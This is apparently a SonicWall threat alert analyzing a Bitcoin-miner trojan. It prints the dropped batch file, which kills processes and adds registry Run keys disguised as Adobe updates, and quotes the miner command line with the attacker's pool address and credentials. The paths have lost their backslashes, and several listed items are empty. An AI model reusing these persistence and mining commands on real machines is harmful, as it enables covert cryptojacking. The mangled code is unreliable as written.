
The Sonicwall UTM research team received reports of a new Bitcoin Miner Trojan in the wild. Bitcoin is a decentralized p2p crypto-currency. This kind of malware has been covered in a previous sonicalert but has recently become more and more prevalent as attackers recognise it as an easy and effective way to generate and transfer currency without being caught.
The Trojan uses the following icon:

The Trojan makes the following DNS request:

The Trojan adds the following keys to the windows registry to enable startup after reboot:
The Trojan adds the following files to the filesystem:
rundll32.exe is an application called StealthRunner that is written by a user on the bitcointalk.org forum. It uses the following icon:

svchost.exe and svchost2.exe use the following icons:


bat.bat contains the following text:
@echo off%windir%system32taskkill.exe /im svchost.exe%windir%system32taskkill.exe /im rundll32.exe%windir%system32taskkill.exe /im svchost2.exe%windir%system32reg.exe add HKCUsoftwaremicrosoftwindowscurrentversionrun /v adobeupdate /d ""%appdata%3 4l3.lnk"" /f%windir%system32reg.exe add HKCUsoftwaremicrosoftwindowscurrentversionrun /v adobeupdater /d ""%appdata%3 4rundll32.exe"" /fsettings.txt contains the bitcoin mining account data of the attacker:
svchost2.exe -o http://eu.triplemining.com:8344 -u klazim2000_3 -p 7747 30The Trojan was observed communicating with the mining server:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:
Share This Article

An Article By
An Article By
Security News
Security News